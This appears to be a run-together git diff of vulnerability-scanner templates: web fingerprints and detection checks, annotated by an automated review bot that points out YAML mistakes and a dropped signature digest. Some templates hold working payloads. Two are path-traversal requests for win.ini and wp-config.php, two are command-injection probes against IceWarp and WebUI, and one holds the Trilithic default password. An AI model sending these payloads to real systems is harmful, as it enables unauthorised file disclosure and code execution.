apache-flink @@ -791,8 +787,11 @@ http: name: apache-kylin words: - + + - type: word + name: apache-kylin + words: - href="/kylin/" - condition: or - type: word name: apache-mesos @@ -841,13 +840,6 @@ http: words: - "Location: /solr/" - - type: word - part: header - name: apache-dubbo - words: - - 'Www-Authenticate: Basic realm="dubbo"' - case-insensitive: true - - type: word name: apache-struts words: 
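Review bot: After the `@@ -717,16 +715,14 @@` hunk of fingerprinthub-web-fingerprints the `apache-cocoon` matcher is left with `part: header` and `name:` but no `words:` list: the `"X-Cocoon-Version"` entry is removed and the following `words:` key now belongs to the re-inserted `apache-druid` matcher. A word matcher with nothing to match either fails template validation or can never identify Cocoon, depending on the engine version. Restore `words:` with `- "X-Cocoon-Version"` under `apache-cocoon`. This reading relies on the hunk's line counts, since the diff lines on this page are run together, so check it against the file.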
@@ -887,7 +879,7 @@ http: part: header name: apilayer-caddy words: - - "Server: Caddy" + - "Server: caddy" - type: word name: appcms @@ -925,10 +917,10 @@ http: - 管理apusic应用服务器 - type: word - part: server + part: header name: apusic words: - - "Apusic Application Server" + - "Server: apusic application server" - type: word name: arab-portal @@ -1796,7 +1788,8 @@ http: - type: word name: cerberus-helpdesk words: - - + - - type: word name: symantec-endpoint-protection-manager words: - - symantec endpoint protection manager
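Review bot: `- "Server: caddy"` in the `apilayer-caddy` matcher is all lower case and the hunk shows no `case-insensitive: true`, so a response carrying `Server: Caddy` no longer matches unless case-insensitivity is set outside the visible lines. The `apusic` matcher in the `@@ -925,10 +917,10 @@` hunk has the same problem with `"Server: apusic application server"`; its `part: server` to `part: header` change is fine. Either keep the vendor's casing or add `case-insensitive: true` to both matchers, as the removed `apache-dubbo` matcher did.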
web access
+ - symantec endpoint + protection manager
web access
- type: word name: symantec-thawte_ssl_cert @@ -12065,7 +12086,8 @@ http: - type: word name: synology-webstation words: - - id="paragraph">web station has been enabled. to finish setting up your website, please see the "web service + - id="paragraph">web station has been enabled. to finish setting up your website, + please see the "web service - type: word name: tab-and-link-manager @@ -12187,7 +12209,8 @@ http: - type: word name: telenor-4g-router words: - - please power off and plug in (u)sim card. then power on again. or pin is permanently blocked, please contact the provider + - please power off and plug in (u)sim card. then power on again. or pin is permanently + blocked, please contact the provider - type: word name: teleradiology-telrads @@ -12753,7 +12776,8 @@ http: - type: word name: turbo-seek words: - - var myspecs = "'menubar=0,status=1,resizable=1,location=0,titlebar=1,toolbar=1,scrollbars=1,width=" + mywidth + ",height=" + myheight + + - var myspecs = "'menubar=0,status=1,resizable=1,location=0,titlebar=1,toolbar=1,scrollbars=1,width=" + + mywidth + ",height=" + myheight + - type: word name: turbomail @@ -12839,13 +12863,6 @@ http: words: - welcome to nginx on ubuntu! - - type: word - name: openeuler - words: - - Test Page for the Apache HTTP Server on openEuler Linux - - Test Page for the Nginx HTTP Server on openEuler - condition: or - - type: word name: ucap-search- words: @@ -12931,7 +12948,8 @@ http: - type: word name: ultrastats words: - - + - - type: word name: uniform-server @@ -12946,7 +12964,8 @@ http: - type: word name: uniform-server words: - - + - - type: word name: unimas-cameraaudit @@ -12998,12 +13017,14 @@ http: - type: word name: useresponse words: - - + - title="customer feedback software, community support system" target="_blank" + href="http://www.useresponse.com" class="popup-logo"> - type: word name: useso 
@@ -13095,7 +13116,8 @@ http: - type: word name: vbulletin words: - - powered by < a href="https://www.vbulletin.com" id="vbulletinlink"> + - powered by < a href="https://www.vbulletin.com" + id="vbulletinlink"> - type: word name: vcalendar @@ -13584,7 +13606,8 @@ http: - type: word name: web-data-administrator words: - - shopping cart software' + - 'powered by webasyst shop-script shopping cart software' - type: word name: webbased-pear-package-manager @@ -13674,7 +13698,8 @@ http: - type: word name: webissues words: - -
+ -
- type: word name: weblogic @@ -13815,12 +13840,14 @@ http: - type: word name: whatweb words: - -
+ -
troy serial server
- type: word name: whatweb words: - - network card access password: + - network card access password: - type: word name: whfst-cms @@ -13860,7 +13887,8 @@ http: - type: word name: whmcs words: - -
please login or register
+ -
please login + or register
- type: word name: whtzjkj-erp @@ -14347,6 +14375,13 @@ http: words: - 神盾fs3文档安全共享系统v2.0 + - type: word + condition: and + name: yapi + words: + - YApi + - 可视化接口管理平台 + - type: word name: yearning words: @@ -14360,7 +14395,8 @@ http: - type: word name: yelala words: - - '' + - '' - type: word name: yfidea-oa @@ -14635,7 +14671,8 @@ http: - type: word name: yunanbao-yunxz words: - - 'id=mtokenplugin width=0 height=0 style="position: absolute;left: 0px; top: 0px"' + - 'id=mtokenplugin width=0 height=0 style="position: absolute;left: 0px; top: + 0px"' - type: word name: yuneasy-ipcalling @@ -14940,7 +14977,8 @@ http: - type: word name: zkteco-security-management-system words: - - $(".copyright").text("copyright ? " + server_current_year + " zkteco co., ltd. all rights reserved"); + - $(".copyright").text("copyright ? " + server_current_year + " zkteco co., ltd. + all rights reserved"); - type: word name: zkteco-system @@ -15018,7 +15056,8 @@ http: - type: word name: zxoa words: - - name="button1" value="" onclick="javascript:return checkfrom();" id="button1" class="loginbtn" /> + - name="button1" value="" onclick="javascript:return checkfrom();" id="button1" + class="loginbtn" /> - type: word name: zzcms @@ -15035,34 +15074,4 @@ http: words: - Powered by ZZZcms - - type: word - name: bitwarden - words: - - Bitwarden Web Vault - - - type: word - name: OpenBSD relayd - part: header - words: - - "Server: OpenBSD httpd" - - - type: word - name: Hunchentoot - part: header - words: - - "Server: Hunchentoot" - - - type: word - name: weblate - words: - - Weblate - - - condition: and - - - type: word - name: Adobe Experience Manager (AEM) - part: header - words: - - "x-dispatcher:" - case-insensitive: true -# digest: 4b0a00483046022100bc94744c796eb79eba218d1c041ec0e817654420bfc1a1c188d90dcfc8506dcc0221008763af93a66376ac9b4dbee14f6d8a1db56f84bfc29474faefd0f50ffd68ea6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# Enhanced by cs on 2022/02/08 
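Review bot: The final fingerprinthub hunk deletes the trailing `# digest:` line and adds `# Enhanced by cs on 2022/02/08`, so the file no longer carries the signature that lets a consumer check it against the publisher's signed copy. Elsewhere in this file's diff, `http:` reverts to `requests:` and the `max-request` metadata is removed, which suggests an older revision is overwriting a newer signed one. The iplanet-web-server and wordpress-git-config diffs further down show the same pattern. For a bot-authored bulk sync, confirm that each file comes from the intended source, and if unsigned templates are expected, state that in the repository documentation. This hunk also drops the bitwarden, weblate and AEM fingerprints without replacement.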
diff --git a/poc/web/geovision-geowebserver-lfi-7595.yaml b/poc/web/geovision-geowebserver-lfi-7595.yaml index 6f8dc53b3e..c0e7dbfcad 100644 --- a/poc/web/geovision-geowebserver-lfi-7595.yaml +++ b/poc/web/geovision-geowebserver-lfi-7595.yaml @@ -1,19 +1,22 @@ id: geowebserver-lfi + info: name: GeoVision Geowebserver 5.3.3 - LFI author: madrobot severity: high description: A vulnerability in GeoVision Geowebserver allows remote unauthenticated attackers to disclose the content of locally stored files. - reference: - - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt + reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt tags: geowebserver,lfi + requests: - method: GET path: - "{{BaseURL}}/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini" - "{{BaseURL}}/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa" + matchers-condition: and matchers: + - type: word words: - "bit app support" @@ -21,6 +24,7 @@ requests: - "extensions" condition: and part: body + - type: status status: - 200 diff --git a/poc/web/icewarp-webclient-rce-8129.yaml b/poc/web/icewarp-webclient-rce-8129.yaml index caa8758541..a7494e8328 100644 --- a/poc/web/icewarp-webclient-rce-8129.yaml +++ b/poc/web/icewarp-webclient-rce-8129.yaml 
@@ -1,12 +1,11 @@ id: icewarp-webclient-rce - info: name: IceWarp WebClient RCE author: gy741 severity: critical + reference: + - https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E tags: icewarp,rce - reference: https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E - requests: - raw: - | @@ -15,14 +14,12 @@ requests: Content-Type: application/x-www-form-urlencoded _dlg[captcha][target]=system(\'ver\')\ - matchers-condition: and matchers: - type: word words: - "Microsoft Windows [Version" part: body - - type: status status: - 302 diff --git a/poc/web/iplanet-web-server-8190.yaml b/poc/web/iplanet-web-server-8190.yaml index e496eac963..78c1d984a9 100644 --- a/poc/web/iplanet-web-server-8190.yaml +++ b/poc/web/iplanet-web-server-8190.yaml @@ -1,28 +1,21 @@ id: iplanet-web-server - info: name: Detect iPlanet Webserver Detection author: pussycat0x severity: info metadata: - max-request: 1 fofa-query: app="iPlanet-Web-Server,-Enterprise-Edition-4.1" tags: tech,webserver - -http: +requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: word part: body words: - "iPlanet" - - type: status status: - 200 - -# digest: 4a0a0047304502210085231abeb2eece3463a8001f3a5b066c5f5f30aa5823fbf2eb4b10520b79fb0702201d87c5ced6a65a59d948f624dbd2977a123af662c5f4cd755b61b60663cf4f53:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/keenetic-web-login-8442.yaml b/poc/web/keenetic-web-login-8442.yaml index ad827f8f73..bc9aba324b 100644 --- a/poc/web/keenetic-web-login-8442.yaml +++ b/poc/web/keenetic-web-login-8442.yaml 
@@ -1,15 +1,17 @@ id: keenetic-web-login + info: name: Keenetic Web Login author: dhiyaneshDK severity: info - reference: - - https://www.exploit-db.com/ghdb/6817 + reference: https://www.exploit-db.com/ghdb/6817 tags: panel,keenetic + requests: - method: GET path: - '{{BaseURL}}/login#goto=%2Fdashboard' + matchers-condition: and matchers: - type: word diff --git a/poc/web/microsoft-teams-webhook.yaml b/poc/web/microsoft-teams-webhook.yaml index 8e6497e83d..a96a661eb0 100644 --- a/poc/web/microsoft-teams-webhook.yaml +++ b/poc/web/microsoft-teams-webhook.yaml @@ -3,7 +3,7 @@ info: name: Microsoft Teams Webhook Disclosure author: Ice3man severity: info - tags: exposure,token + tags: exposure,token,microsoft requests: - method: GET path: diff --git a/poc/web/microweber-xss-8865.yaml b/poc/web/microweber-xss-8865.yaml index e3b0bb3e84..70c7e8a91c 100644 --- a/poc/web/microweber-xss-8865.yaml +++ b/poc/web/microweber-xss-8865.yaml @@ -3,16 +3,17 @@ info: name: Microweber Cross-Site Scripting author: gy741 severity: high - description: Microweber prior to 1.2.11 is susceptible to reflected cross-site Scripting via Packagist microweber/microweber. + description: "Microweber prior to 1.2.11 is susceptible to reflected cross-site Scripting via Packagist microweber/microweber." reference: - https://github.com/microweber/microweber/issues/809 - https://github.com/microweber/microweber + metadata: + shodan-query: 'http.favicon.hash:780351152' classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 + cve-id: cwe-id: CWE-79 - metadata: - shodan-query: http.favicon.hash:780351152 tags: microweber,xss,oss requests: - method: GET diff --git a/poc/web/oracle-iplanet-web-server-9393.yaml b/poc/web/oracle-iplanet-web-server-9393.yaml index 8bd76eabb4..dcf6b13bc8 100644 --- a/poc/web/oracle-iplanet-web-server-9393.yaml +++ b/poc/web/oracle-iplanet-web-server-9393.yaml 
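Review bot: The microweber-xss hunk adds `cve-id:` with no value under `classification:`, which YAML loads as null instead of treating the field as absent. If no CVE is assigned, the key should be omitted; otherwise the identifier should be filled in. A bare key also trips strict linters (yamllint `empty-values`).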
@@ -1,21 +1,26 @@ id: oracle-iplanet-web-server + info: name: Detect Oracle-iPlanet-Web-Server author: pussycat0x severity: info - metadata: - fofa-query: app="Oracle-iPlanet-Web-Server tags: tech,oracle + metadata: + fofa-query: 'app="Oracle-iPlanet-Web-Server' + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word + part: body words: - "Oracle iPlanet Web Server" + - type: status status: - 200 diff --git a/poc/web/saia-web-server-info-9980.yaml b/poc/web/saia-web-server-info-9980.yaml index 91bf6d9d5b..36354a771d 100644 --- a/poc/web/saia-web-server-info-9980.yaml +++ b/poc/web/saia-web-server-info-9980.yaml @@ -1,24 +1,21 @@ id: saia-web-server - info: name: Saia PCD Web-Server author: DhiyaneshDk severity: low - reference: https://www.exploit-db.com/ghdb/6865 + reference: + - https://www.exploit-db.com/ghdb/6865 tags: config,exposure - requests: - method: GET path: - "{{BaseURL}}/loadtextfile.htm#programinfo" - matchers-condition: and matchers: - type: word words: - "Saia PCD Web Server" part: body - - type: status status: - 200 diff --git a/poc/web/total-web-10816.yaml b/poc/web/total-web-10816.yaml index ba8a8510dc..8bd260cf04 100644 --- a/poc/web/total-web-10816.yaml +++ b/poc/web/total-web-10816.yaml @@ -1,17 +1,14 @@ id: total-web-login - info: name: Total Web Solution author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6811 tags: panel - requests: - method: GET path: - '{{BaseURL}}' - matchers-condition: and matchers: - type: word diff --git a/poc/web/web-config-11126.yaml b/poc/web/web-config-11126.yaml index 68df3b091a..7c1e1b7f62 100644 --- a/poc/web/web-config-11126.yaml +++ b/poc/web/web-config-11126.yaml 
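Review bot: The newly quoted `fofa-query: 'app="Oracle-iPlanet-Web-Server'` in the oracle-iplanet-web-server hunk still has an unterminated inner double quote, so the query is malformed for anyone who copies it out of the template. It should read `fofa-query: 'app="Oracle-iPlanet-Web-Server"'`.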
@@ -1,159 +1,15 @@ id: web-config + info: name: Web Config file - author: nullenc0de - severity: medium + author: Yash Anand @yashanand155 + severity: info tags: config,exposure requests: - method: GET path: - - "{{BaseURL}}/.web.config.swo" - - "{{BaseURL}}/.web.config.swp" - - "{{BaseURL}}/.web.config.swp" - - "{{BaseURL}}/backup.web.config" - - "{{BaseURL}}/web.config" - - "{{BaseURL}}/web.config - Copy" - - "{{BaseURL}}/web.config copy" - - "{{BaseURL}}/web.config_backup" - - "{{BaseURL}}/web.config_good" - - "{{BaseURL}}/web.config-backup" - - "{{BaseURL}}/web.config-backup.old" - - "{{BaseURL}}/web.config-backup.txt" - - "{{BaseURL}}/web.config-backup1.txt" - - "{{BaseURL}}/web.config-good" - - "{{BaseURL}}/web.config-sample.new" - - "{{BaseURL}}/web.config-sample.bak" - - "{{BaseURL}}/web.config-sample~" - - "{{BaseURL}}/web.config.backup" - - "{{BaseURL}}/web.config.bak" - - "{{BaseURL}}/web.config.bkp" - - "{{BaseURL}}/web.config.cfg" - - "{{BaseURL}}/web.config.conf" - - "{{BaseURL}}/web.config.data" - - "{{BaseURL}}/web.config.dump" - - "{{BaseURL}}/web.config.htm" - - "{{BaseURL}}/web.config.html" - - "{{BaseURL}}/web.config.local" - - "{{BaseURL}}/web.config.old" - - "{{BaseURL}}/web.config.old.old" - - "{{BaseURL}}/web.config.ORG" - - "{{BaseURL}}/web.config.orig" - - "{{BaseURL}}/web.config.original" - - "{{BaseURL}}/web.config" - - "{{BaseURL}}/web.config_" - - "{{BaseURL}}/web.config__" - - "{{BaseURL}}/web.config______" - - "{{BaseURL}}/web.config__olds" - - "{{BaseURL}}/web.config_1" - - "{{BaseURL}}/web.config_backup" - - "{{BaseURL}}/web.config_bak" - - "{{BaseURL}}/web.config_bk" - - "{{BaseURL}}/web.config_new" - - "{{BaseURL}}/web.config_old" - - "{{BaseURL}}/web.config_old2017" - - "{{BaseURL}}/web.config_old2018" - - "{{BaseURL}}/web.config_old2019" - - "{{BaseURL}}/web.config_old2020" - - "{{BaseURL}}/web.config_orig" - - "{{BaseURL}}/web.config_original" - - "{{BaseURL}}/web.config-" - - "{{BaseURL}}/web.config-backup" - - 
"{{BaseURL}}/web.config-bak" - - "{{BaseURL}}/web.config-n" - - "{{BaseURL}}/web.config-o" - - "{{BaseURL}}/web.config-old" - - "{{BaseURL}}/web.config-original" - - "{{BaseURL}}/web.config-save" - - "{{BaseURL}}/web.config-work" - - "{{BaseURL}}/web.config.0" - - "{{BaseURL}}/web.config.1" - - "{{BaseURL}}/web.config.2" - - "{{BaseURL}}/web.config.3" - - "{{BaseURL}}/web.config.4" - - "{{BaseURL}}/web.config.5" - - "{{BaseURL}}/web.config.6" - - "{{BaseURL}}/web.config.7" - - "{{BaseURL}}/web.config.9" - - "{{BaseURL}}/web.config.a" - - "{{BaseURL}}/web.config.aws" - - "{{BaseURL}}/web.config.azure" - - "{{BaseURL}}/web.config.b" - - "{{BaseURL}}/web.config.backup" - - "{{BaseURL}}/web.config.backup.txt" - - "{{BaseURL}}/web.config.bak" - - "{{BaseURL}}/web.config.bk" - - "{{BaseURL}}/web.config.bkp" - - "{{BaseURL}}/web.config.c" - - "{{BaseURL}}/web.config.com" - - "{{BaseURL}}/web.config.cust" - - "{{BaseURL}}/web.config.dev" - - "{{BaseURL}}/web.config.dump" - - "{{BaseURL}}/web.config.in" - - "{{BaseURL}}/web.config.local" - - "{{BaseURL}}/web.config.maj" - - "{{BaseURL}}/web.config.new" - - "{{BaseURL}}/web.config.old" - - "{{BaseURL}}/web.config.org" - - "{{BaseURL}}/web.config.orig" - - "{{BaseURL}}/web.config.original" - - "{{BaseURL}}/web.config.php-bak" - - "{{BaseURL}}/web.config.prod" - - "{{BaseURL}}/web.config.production" - - "{{BaseURL}}/web.config.sample" - - "{{BaseURL}}/web.config.save" - - "{{BaseURL}}/web.config.save.1" - - "{{BaseURL}}/web.config.stage" - - "{{BaseURL}}/web.config.staging" - - "{{BaseURL}}/web.config.swn" - - "{{BaseURL}}/web.config.swo" - - "{{BaseURL}}/web.config.swp" - - "{{BaseURL}}/web.config.tar" - - "{{BaseURL}}/web.config.temp" - - "{{BaseURL}}/web.config.tmp" - - "{{BaseURL}}/web.config.txt" - - "{{BaseURL}}/web.config.uk" - - "{{BaseURL}}/web.config.us" - - "{{BaseURL}}/web.config=" - - "{{BaseURL}}/web.config~" - - "{{BaseURL}}/web.config~~~" - - "{{BaseURL}}/web.config1" - - "{{BaseURL}}/web.configa" - - 
"{{BaseURL}}/web.configb" - - "{{BaseURL}}/web.configbak" - - "{{BaseURL}}/web.configc" - - "{{BaseURL}}/web.configd" - - "{{BaseURL}}/web.confign" - - "{{BaseURL}}/web.confignew" - - "{{BaseURL}}/web.configold" - - "{{BaseURL}}/web.configoriginal" - - "{{BaseURL}}/web.configtmp" - - "{{BaseURL}}/web.config.prod.php.txt" - - "{{BaseURL}}/web.config.save" - - "{{BaseURL}}/web.config.tar" - - "{{BaseURL}}/web.config.temp" - - "{{BaseURL}}/web.config.txt" - - "{{BaseURL}}/web.config.zip" - - "{{BaseURL}}/web.config~" - - "{{BaseURL}}/web.configbak" - - "{{BaseURL}}/.web.config.bck" - - "{{BaseURL}}/web.config.back" - - "{{BaseURL}}/web.config.copy" - - "{{BaseURL}}/web.config.dat" - - "{{BaseURL}}/web.config.db" - - "{{BaseURL}}/web.config._inc" - - "{{BaseURL}}/web.config.back" - - "{{BaseURL}}/web.config.bck" - - "{{BaseURL}}/web.config.copy" - - "{{BaseURL}}/web.config.dat" - - "{{BaseURL}}/web.config.db" - - "{{BaseURL}}/web.config.tar.gz" - - "{{BaseURL}}/web.config.test" - - "{{BaseURL}}/web.config.zip" - - "{{BaseURL}}/web.config.tar.gz" - - "{{BaseURL}}/web.config.test" - - "{{BaseURL}}/web.config.tmp" - - "{{BaseURL}}/web.config_inc" + - '{{BaseURL}}/web.config' matchers-condition: and matchers: @@ -165,4 +21,4 @@ requests: - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/web/webflow-takeover.yaml b/poc/web/webflow-takeover.yaml index 3fd3180be6..da17c4a95f 100644 --- a/poc/web/webflow-takeover.yaml +++ b/poc/web/webflow-takeover.yaml @@ -1,15 +1,18 @@ id: webflow-takeover + info: name: webflow takeover detection - author: pdcommunity + author: pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: - -

The page you are looking for doesn't exist or has been moved.

+ -

The page you are looking for doesn't exist or has been moved.

\ No newline at end of file diff --git a/poc/web/weblogic-detect-11144.yaml b/poc/web/weblogic-detect-11144.yaml index 23f46a01a8..d50d670388 100644 --- a/poc/web/weblogic-detect-11144.yaml +++ b/poc/web/weblogic-detect-11144.yaml @@ -1,22 +1,13 @@ id: weblogic-detect info: name: Detect Weblogic - author: pdteam + author: bing0o severity: info - tags: tech,weblogic - metadata: - shodan-query: product:"Oracle Weblogic" requests: - method: GET path: - - "{{BaseURL}}/{{randstr}}" - matchers-condition: and + - "{{BaseURL}}/console/login/LoginForm.jsp" matchers: - type: word words: - - "From RFC 2068" - - "Error 404--Not Found" - condition: and - - type: status - status: - - 404 + - "WebLogic" diff --git a/poc/web/webmodule-ee.yaml b/poc/web/webmodule-ee.yaml index b4aa17abf0..ab6ad7a796 100644 --- a/poc/web/webmodule-ee.yaml +++ b/poc/web/webmodule-ee.yaml @@ -1,17 +1,14 @@ id: webmodule-ee-detection - info: name: Webmodule Detection author: pussycat0x severity: info reference: https://www.exploit-db.com/ghdb/7001 tags: webmodule-ee,tech - requests: - method: GET path: - "{{BaseURL}}/webmodule-ee/login.seam" - matchers-condition: and matchers: - type: word diff --git a/poc/web/webui-rce.yaml b/poc/web/webui-rce.yaml index 09b1d2e004..372b5a39ce 100644 --- a/poc/web/webui-rce.yaml +++ b/poc/web/webui-rce.yaml 
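Review bot: The rewritten weblogic-detect matcher reports a hit whenever the body of `/console/login/LoginForm.jsp` contains the word `WebLogic`, with no status check and no `matchers-condition`. Any catch-all page or error response that echoes the product name is therefore counted as a detection. Restoring `matchers-condition: and` together with a status matcher for 200 would cut those false positives. The hunk also removes `tags: tech,weblogic`, which takes the template out of tag-based selection and exclusion, so that line should be kept.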
@@ -1,21 +1,32 @@ id: webui-rce + info: - name: WebUI 1.5b6 RCE + name: WebUI 1.5b6 - Remote Code Execution author: pikpikcu severity: critical - description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter. - reference: https://www.exploit-db.com/exploits/36821 + description: WebUI 1.5b6 is vulnerable to remote code execution because the 'mainfile.php' endpoint allows remote attackersto execute arbitrary code via the 'Logon' parameter. + reference: + - https://www.exploit-db.com/exploits/36821 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: webui,rce + requests: - method: GET path: - '{{BaseURL}}/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27' + matchers-condition: and matchers: - type: word words: - "c5b3d7397a90f42d222f7ed9408c0dc6" part: body + - type: status status: - 200 + +# Enhanced by mp on 2022/06/03 diff --git a/poc/web/xp-webcam-11699.yaml b/poc/web/xp-webcam-11699.yaml index 421bc7db2d..f9942032ad 100644 --- a/poc/web/xp-webcam-11699.yaml +++ b/poc/web/xp-webcam-11699.yaml @@ -1,22 +1,26 @@ id: xp-webcam + info: name: XP Webcam Viewer Page author: aashiq severity: medium - description: Searches for exposed webcams by querying the /mobile.html endpoint and the existence of webcamXP in the body. + description: Searches for exposed webcams by querying the /mobile.html endpoint and existance of webcamXP in the body tags: webcam,iot + requests: - method: GET path: - "{{BaseURL}}/mobile.html" + matchers-condition: and matchers: - type: word words: - "webcams and ip cameras server for windows" part: body + - type: word words: - "Please provide a valid username/password to access this server." part: body - negative: true + negative: true \ No newline at end of file 
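Review bot: The new `description` in the webui-rce hunk contains the run-together word `attackersto`; it should read `allows remote attackers to execute arbitrary code via the 'Logon' parameter`. The xp-webcam hunk that follows introduces `existance` in its description (should be `existence`) and drops the sentence's closing period. Both strings surface in scan reports, so they are worth fixing before merge.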
diff --git a/poc/web/zimbra-web-client-11812.yaml b/poc/web/zimbra-web-client-11812.yaml index 03481f8e9f..0f5d9c4bf5 100644 --- a/poc/web/zimbra-web-client-11812.yaml +++ b/poc/web/zimbra-web-client-11812.yaml @@ -1,26 +1,23 @@ id: zimbra-web-client - info: name: Zimbra Web Client - Sign In author: dhiyaneshDk severity: info - reference: https://www.exploit-db.com/ghdb/7409 + reference: + - https://www.exploit-db.com/ghdb/7409 metadata: - shodan-query: 'http.title:"Zimbra Web Client Sign In"' + shodan-query: http.title:"Zimbra Web Client Sign In" tags: panel,zimbra - requests: - method: GET path: - "{{BaseURL}}/zimbraAdmin/" - matchers-condition: and matchers: - type: word part: body words: - "Zimbra Administration" - - type: status status: - 200 diff --git a/poc/web/zoho-webhook-token-11835.yaml b/poc/web/zoho-webhook-token-11835.yaml old mode 100644 new mode 100755 index f3aa557a4a..3fccd958a2 --- a/poc/web/zoho-webhook-token-11835.yaml +++ b/poc/web/zoho-webhook-token-11835.yaml @@ -1,9 +1,11 @@ id: zoho-webhook-token + info: name: Zoho Webhook Disclosure author: Ice3man severity: info tags: exposure,token,zoho + requests: - method: GET path: diff --git a/poc/wordpress/alfacgiapi-wordpress-257.yaml b/poc/wordpress/alfacgiapi-wordpress-257.yaml index 271a1c4865..69b0d39f88 100644 --- a/poc/wordpress/alfacgiapi-wordpress-257.yaml +++ b/poc/wordpress/alfacgiapi-wordpress-257.yaml 
@@ -1,32 +1,30 @@ -id: alfacgiapi-wordpress - -info: - name: alfacgiapi - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the ALFA_DATA. - reference: https://www.exploit-db.com/ghdb/6999 - tags: wordpress,listing - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-includes/ALFA_DATA/" - - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - type: word - words: - - "/wp-content/plugins/" - - "/wp-includes/ALFA_DATA/" - - "/ALFA_DATA/alfacgiapi/" - - "/cgi-bin/ALFA_DATA/alfacgiapi/" - condition: or - - type: status - status: - - 200 +id: alfacgiapi-wordpress +info: + name: alfacgiapi + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the ALFA_DATA. + reference: https://www.exploit-db.com/ghdb/6999 + tags: wordpress,listing +requests: + - method: GET + path: + - "{{BaseURL}}/wp-includes/ALFA_DATA/" + - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - type: word + words: + - "/wp-content/plugins/" + - "/wp-includes/ALFA_DATA/" + - "/ALFA_DATA/alfacgiapi/" + - "/cgi-bin/ALFA_DATA/alfacgiapi/" + condition: or + - type: status + status: + - 200 diff --git a/poc/wordpress/nativechurch-wp-theme-lfd-9001.yaml b/poc/wordpress/nativechurch-wp-theme-lfd-9001.yaml index d0e87d86b0..eba8ffcbf7 100644 --- a/poc/wordpress/nativechurch-wp-theme-lfd-9001.yaml +++ b/poc/wordpress/nativechurch-wp-theme-lfd-9001.yaml 
@@ -1,16 +1,18 @@ id: nativechurch-wp-theme-lfd + info: - name: WordPress NativeChurch Theme - Arbitrary File Retrieval + name: WordPress NativeChurch Theme Arbitrary File Download author: 0x_Akoko severity: high - description: An arbitrary file retrieval vulnerability in the download.php file in the NativeChurch Theme allows attackers to download files from the system. - reference: - - https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html + description: A LFD Bug In download.php File In NativeChurch Theme And Make Site Vulnerable. + reference: https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html tags: wordpress,wp-theme,lfi + requests: - method: GET path: - '{{BaseURL}}/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php' + matchers-condition: and matchers: - type: word diff --git a/poc/wordpress/trilithic-viewpoint-login.yaml b/poc/wordpress/trilithic-viewpoint-login.yaml index 6046927036..953095f4f0 100644 --- a/poc/wordpress/trilithic-viewpoint-login.yaml +++ b/poc/wordpress/trilithic-viewpoint-login.yaml 
@@ -1,21 +1,29 @@ id: trilithic-viewpoint-default info: - name: Trilithic Viewpoint Default Credentials + name: Trilithic Viewpoint Default Login author: davidmckennirey severity: high - description: | - Searches for default admin credentials for the (discontinued) Trilithic Viewpoint application. + description: Trilithic Viewpoint application default admin credentials were discovered. Note this product has been discontinued. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: default-login,trilithic,viewpoint requests: - raw: - | POST /ViewPoint/admin/Site/ViewPointLogin HTTP/1.1 Host: {{Hostname}} - Content-Length: 65 Content-Type: application/json Cookie: trilithic_win_auth=false - {u:"admin", t:"undefined", p:"trilithic", d:"", r:false, w:false} + {u:"{{username}}", t:"undefined", p:"{{password}}", d:"", r:false, w:false} + payloads: + username: + - admin + password: + - trilithic + attack: pitchfork matchers-condition: and matchers: - type: status @@ -27,3 +35,5 @@ requests: - 'redirectUrl' part: body condition: and + +# Enhanced by mp on 2022/03/13 diff --git a/poc/wordpress/viewpoint-system-status-11016.yaml b/poc/wordpress/viewpoint-system-status-11016.yaml index 